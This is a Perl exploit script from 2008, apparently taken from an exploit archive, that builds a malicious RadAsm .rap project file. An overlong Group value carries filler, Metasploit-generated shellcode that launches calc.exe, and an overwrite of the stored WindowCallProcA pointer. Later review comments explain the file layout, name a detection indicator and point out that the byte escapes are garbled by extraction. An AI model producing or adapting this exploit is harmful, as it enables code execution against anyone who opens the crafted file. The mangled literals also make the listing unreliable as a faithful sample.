
# Title : RadAsm <= 2.2.1.5 (.RAP File) WindowCallProcA Pointer Hijack Exploit
# Published : 2008-12-03
# Author : DATA_SNIPER


#!/usr/bin/perl
# RadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit
#Tested on Windows XP SP2 FR; it may also work under Windows XP SP3.
#A long value for the Group key in the project file (".rap" files) can overwrite the pointer to
#WindowCallProcA that was stored in memory.
#So we overwrite the pointer and make it point to our shellcode address.
#This exploit was written for the previous version, 2.2.1 ("I'm too lazy to make another exploit for the newest version :)").
#If you want to build your own exploit, pay attention to the address of the shellcode and the buffer before and after the
#shellcode.
#Sorry for my bad english :=)
#greetZ to:Gaming_Master,Mouradpr,Pirat_Digital,Koudelka,djug,Alpha_Hunter,DeltaAzize,synt_err,super-crystal,Al-alamE
#Anaconda,AT4RE TEAM,Arab4Services TEAM,All Algerian Hackerz.

# Flat script: prints a banner, then writes one RadAsm project file
# (POC.rap) into the current working directory.
# NOTE(review): the string escape sequences in this listing look mangled by
# extraction (hex byte escapes without their prefix, a bare "n" where a
# newline was meant, and a missing "x" at the start of one FileHeader line);
# the literals are kept exactly as found, so the bytes below should not be
# treated as a reliable sample for signature writing.
# No `use strict` / `use warnings`: every variable except $shellcode and
# $poc below is an undeclared package global.
print "nRadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploitn";
print "Discovered by DATA_SNIPERn";
print "n";
print "[->] Building  poc.rap..n";
# "Created" is announced before the file is actually opened or written.
print "[->] poc.rap Created have unf :)n";
# win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
# Payload bytes as generated by the tool named in the comment above; they are
# embedded in the Group value assembled at the end of this script.
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex47".
"x45x30x4ax47x41x30x4fx4ex4bx38x4fx34x4ax31x4bx48".
"x4fx55x42x32x41x30x4bx4ex49x44x4bx48x46x33x4bx58".
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x55x46x32x46x50x45x37x45x4ex4bx48".
"x4fx35x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx44".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx48x4ex31x4bx58".
"x41x50x4bx4ex49x38x4ex35x46x52x46x50x43x4cx41x33".
"x42x4cx46x56x4bx38x42x44x42x43x45x58x42x4cx4ax47".
"x4ex30x4bx48x42x54x4ex30x4bx38x42x37x4ex51x4dx4a".
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx48x42x38x42x4b".
"x42x30x42x50x42x50x4bx38x4ax36x4ex53x4fx45x41x33".
"x48x4fx42x56x48x35x49x38x4ax4fx43x38x42x4cx4bx47".
"x42x45x4ax46x50x57x4ax4dx44x4ex43x37x4ax36x4ax49".
"x50x4fx4cx48x50x50x47x45x4fx4fx47x4ex43x36x41x56".
"x4ex36x43x36x50x52x45x46x4ax57x45x56x42x30x5a";

# Project-file skeleton written as hex byte escapes. Decoded, it is ordinary
# INI-style text: "[Project]", "Assembler=masm", "Group=1", "GroupExpand=1",
# then [Files], [MakeFiles] and [MakeDef] sections, and it ends with
# "[Group]" CRLF "Group=" -- so everything appended after it in the final
# print becomes the value of that single Group key.
$FileHeader =
"x5Bx50x72x6Fx6Ax65x63x74x5Dx0Dx0Ax41x73x73x65x6Dx62x6Cx65x72x3Dx6Dx61x73x6Dx0Dx0Ax47x72x6Fx75x70".
"x3Dx31x0Dx0Ax47x72x6Fx75x70x45x78x70x61x6Ex64x3Dx31x0Dx0Ax5Bx46x69x6Cx65x73x5Dx0Dx0Ax31x3Dx41x56".
"x50x20x4Fx76x65x72x2Ex41x73x6Dx0Dx0Ax32x3Dx41x56x50x20x4Fx76x65x72x2Ex49x6Ex63x0Dx0Ax5Bx4Dx61x6B".
"x65x46x69x6Cx65x73x5Dx0Dx0Ax30x3Dx41x56x50x20x4Fx76x65x72x2Ex72x65x73x0Dx0Ax5Bx4Dx61x6Bx65x44x65".
"x66x5Dx0Dx0Ax4Dx65x6Ex75x3Dx30x2Cx31x2Cx31x2Cx31x2Cx31x2Cx31x2Cx31x2Cx30x2Cx30x2Cx30x2Cx30x2Cx30".
"x2Cx30x2Cx30x2Cx30x2Cx30x0Dx0Ax31x3Dx34x2Cx4Fx2Cx24x42x5Cx52x43x2Ex45x58x45x20x2Fx76x2Cx31x0Dx0A".
"x32x3Dx33x2Cx4Fx2Cx24x42x5Cx4Dx4Cx2Ex45x58x45x20x2Fx63x20x2Fx63x6Fx66x66x20x2Fx43x70x20x2Fx6Ex6F".
"6Cx6Fx67x6Fx20x2Fx49x22x24x49x22x2Cx32x0Dx0Ax33x3Dx35x2Cx4Fx2Cx24x42x5Cx4Cx49x4Ex4Bx2Ex45x58x45".
"x20x2Fx53x55x42x53x59x53x54x45x4Dx3Ax57x49x4Ex44x4Fx57x53x20x2Fx52x45x4Cx45x41x53x45x20x2Fx56x45".
"x52x53x49x4Fx4Ex3Ax34x2Ex30x20x2Fx4Cx49x42x50x41x54x48x3Ax22x24x4Cx22x20x2Fx4Fx55x54x3Ax22x24x35".
"x22x2Cx33x0Dx0Ax34x3Dx30x2Cx30x2Cx2Cx35x0Dx0Ax35x3Dx72x73x72x63x2Ex6Fx62x6Ax2Cx4Fx2Cx24x42x5Cx43".
"x56x54x52x45x53x2Ex45x58x45x2Cx72x73x72x63x2Ex72x65x73x0Dx0Ax36x3Dx2Ax2Ex6Fx62x6Ax2Cx4Fx2Cx24x42".
"x5Cx4Dx4Cx2Ex45x58x45x20x2Fx63x20x2Fx63x6Fx66x66x20x2Fx43x70x20x2Fx6Ex6Fx6Cx6Fx67x6Fx20x2Fx49x22".
"x24x49x22x2Cx2Ax2Ex61x73x6Dx0Dx0Ax37x3Dx30x2Cx30x2Cx22x24x45x5Cx4Fx6Cx6Cx79x44x62x67x22x2Cx35x0D".
"x0Ax5Bx47x72x6Fx75x70x5Dx0Dx0Ax47x72x6Fx75x70x3D";
# Four bytes that the header comment describes as replacing the stored
# WindowCallProcA pointer. The value is specific to the tested build and
# environment; nothing on this page explains how it was chosen.
$hijackedPointer = "x46x52x49x00";
# Filler: 2143 bytes of 'A' after the payload ...
$overflow = "x41" x 2143 ;
# ... and 66 bytes of 'A' before it (see the concatenation order below).
$INCSELEDGE = "x41" x 66 ;
# Terminator: NUL, then CRLF to end the Group= line.
$SD = "x00x0Dx0A" ;
# Two-arg open with no error check: if POC.rap cannot be created (e.g. an
# unwritable working directory) the failure is silent and the earlier
# "Created" banner has already been printed. Three-arg open with
# `or die "...: $!"` is the idiomatic form.
open(my $poc, "> POC.rap");
# Final layout of the Group value: 66 x 'A', payload, 2143 x 'A', pointer,
# terminator. Defensive note: the observable artefact of this technique is a
# .rap file whose Group= line is several KB long and contains non-printable
# bytes, while the rest of the file is short INI-style text as decoded above.
print $poc $FileHeader.$INCSELEDGE.$shellcode.$overflow.$hijackedPointer.$SD;
# close() is also unchecked; buffered write errors would surface here.
close($poc);
